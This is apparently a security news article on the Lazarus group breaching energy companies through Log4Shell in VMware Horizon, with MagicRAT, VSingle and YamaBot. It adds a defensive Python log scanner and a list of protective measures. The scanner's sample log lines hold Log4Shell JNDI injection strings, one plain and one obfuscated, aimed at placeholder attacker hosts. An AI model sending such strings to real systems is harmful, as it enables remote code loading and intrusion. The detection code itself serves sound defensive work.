The North Korean APT group ‘Lazarus’ (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. Lazarus is a state-backed threat actor known for conducting espionage, data theft, and cryptocurrency-stealing campaigns over the past decade. The threat actors are responsible for hundreds of sophisticated attacks internationally.

According to researchers at Cisco Talos who uncovered the latest operation, Lazarus targeted energy organizations between February and July 2022, leveraging public VMWare Horizon exploits for initial access. From there, they used custom malware families like ‘VSingle’ and ‘YamaBot’ and a previously unknown Remote Access Trojan (RAT) named ‘MagicRAT’ to search for and steal data from infected devices.

Cisco Talos presents several attack strategies that illustrate Lazarus’ latest tactics, techniques, and procedures (TTPs) and highlight the versatility of the sophisticated hacking group. In the first case, the threat actors exploit VMWare servers vulnerable to Log4Shell flaws to run shellcode that establishes a reverse shell for running arbitrary commands on the compromised endpoint. In the second case presented in the report, which concerns a different victim, the initial access and reconnaissance follow similar patterns, but this time the hackers dropped MagicRAT along with VSingle. In the third intrusion case, Lazarus deployed YamaBot, a custom malware written in Go, featuring standard RAT capabilities.

The idea behind these variations is to mix up TTPs and make attribution, detection, and defense more challenging for incident responders. As highlighted in this report, Lazarus is closely monitored by cybersecurity firms, so they can’t afford to become lazy in diversifying their attack chains.
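As an added illustration of the initial-access vector described above (example code written for this page, not code from Cisco Talos or the original article), the following Python snippet scans web-server access log lines for Log4Shell-style JNDI lookup strings, collapsing the lower/upper/default-value lookup nesting that defeats a naive `${jndi:` string match. The log lines, IPs, and paths are constructed samples in Apache/Tomcat combined log format, which is assumed here to resemble what a Horizon front end writes.

```python
import re

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Feb/2022:10:01:12 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.77 - - [15/Feb/2022:10:02:45 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5120 "-" "${jndi:ldap://203.0.113.77:1389/a}"
198.51.100.5 - - [15/Feb/2022:10:03:01 +0000] "GET /broker/xml HTTP/1.1" 200 301 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.5/x}"
203.0.113.10 - - [15/Feb/2022:10:04:30 +0000] "POST /broker/xml HTTP/1.1" 200 301 "-" "VMware Horizon Client"
"""

# A resolved JNDI lookup naming one of the protocols Log4j 2 will dereference.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)

# Log4j lookup nesting that evades naive "${jndi:" matching. Each pattern only
# matches an innermost lookup (no nested "${"), so repeated passes collapse
# the nesting from the inside out.
UNWRAP_PATTERNS = [
    re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE),  # ${lower:J} -> J
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),                                # ${::-j}, ${env:X:-j} -> j
]


def normalize(line: str) -> str:
    """Collapse nested lookups until nothing changes, then lowercase."""
    prev = None
    while prev != line:
        prev = line
        for pattern in UNWRAP_PATTERNS:
            line = pattern.sub(lambda m: m.group(1), line)
    return line.lower()


def scan_log(text: str):
    """Return (line number, JNDI protocol, client IP) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = JNDI_RE.search(normalize(line))
        if match:
            hits.append((lineno, match.group(1), line.split()[0]))
    return hits


if __name__ == "__main__":
    for lineno, proto, ip in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI {proto} lookup from {ip}")
```

A hit is a reason to pull the full request (headers as well as the user agent shown here) and check whether the host was running a vulnerable Log4j version at that time; it is not proof of compromise on its own.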
To protect against sophisticated attacks such as those carried out by the Lazarus group, organizations should:
• Regularly back up data, air gap, and password protect backup copies offline.
• Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
• Implement network segmentation.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
• Install updates/patch operating systems, software, and firmware as soon as practical after they are released.
• Implement monitoring of security events on employee workstations and servers, with a 24/7 Security Operations Center to detect threats and respond quickly.
• Use multi-factor authentication where possible.
• Use strong passwords and regularly change passwords to network systems and accounts, implementing the shortest acceptable timeframe for password changes.
• Avoid reusing passwords for multiple accounts.
• Focus on cybersecurity awareness and training.
• Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.